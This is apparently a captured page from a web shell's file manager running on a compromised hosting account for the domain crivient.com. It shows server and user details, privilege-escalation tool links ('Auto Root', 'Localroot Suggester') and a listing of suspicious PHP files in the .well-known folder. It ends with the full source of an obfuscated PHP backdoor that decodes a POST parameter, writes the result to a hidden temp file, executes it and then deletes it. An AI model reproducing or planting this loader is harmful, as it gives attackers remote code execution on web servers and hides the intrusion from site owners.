Linux premium256.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
Server IP : 162.0.217.164 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : niyknzcu
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
niyknzcu /
crivient.com /
.well-known /
Delete
Unzip
Name
Size
Permission
Date
Action
pki-validation
[ DIR ]
drwxr-xr-x
2026-06-12 12:25
.factor
49
B
-rw-r--r--
2026-03-23 05:47
.htaccess
127
B
-r--r--r--
2026-06-12 08:49
consumer.php
2.61
KB
-rw-r--r--
2026-06-12 12:25
error_log
8.49
KB
-rw-r--r--
2026-04-23 02:11
freesansb.php
890
B
-rw-r--r--
2026-06-12 12:25
modifier.dec.php
2.54
KB
-rw-r--r--
2026-06-12 12:25
modifier.php
1.71
KB
-rw-r--r--
2026-06-12 12:24
seosiloing.php
1014
B
-rw-r--r--
2026-06-12 12:24
Save
Rename
<?php if(array_key_exists("ob\x6A", $_POST)){ $token = array_filter(["/dev/shm", session_save_path(), getcwd(), getenv("TMP"), "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir()]); $element = $_POST["ob\x6A"]; $element = explode( "." , $element) ; $component = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $p = 0; foreach ($element as $v7) {$chS = ord($s[$p%$lenS] ); $d = ((int)$v7 - $chS - ($p%10)) ^ 85; $component.= chr($d ); $p++; } foreach ($token as $val): if ((is_dir($val) and is_writable($val))) { $entity = str_replace("{var_dir}", $val, "{var_dir}/.entry"); if (file_put_contents($entity, $component)) { include $entity; @unlink($entity); exit; } } endforeach; }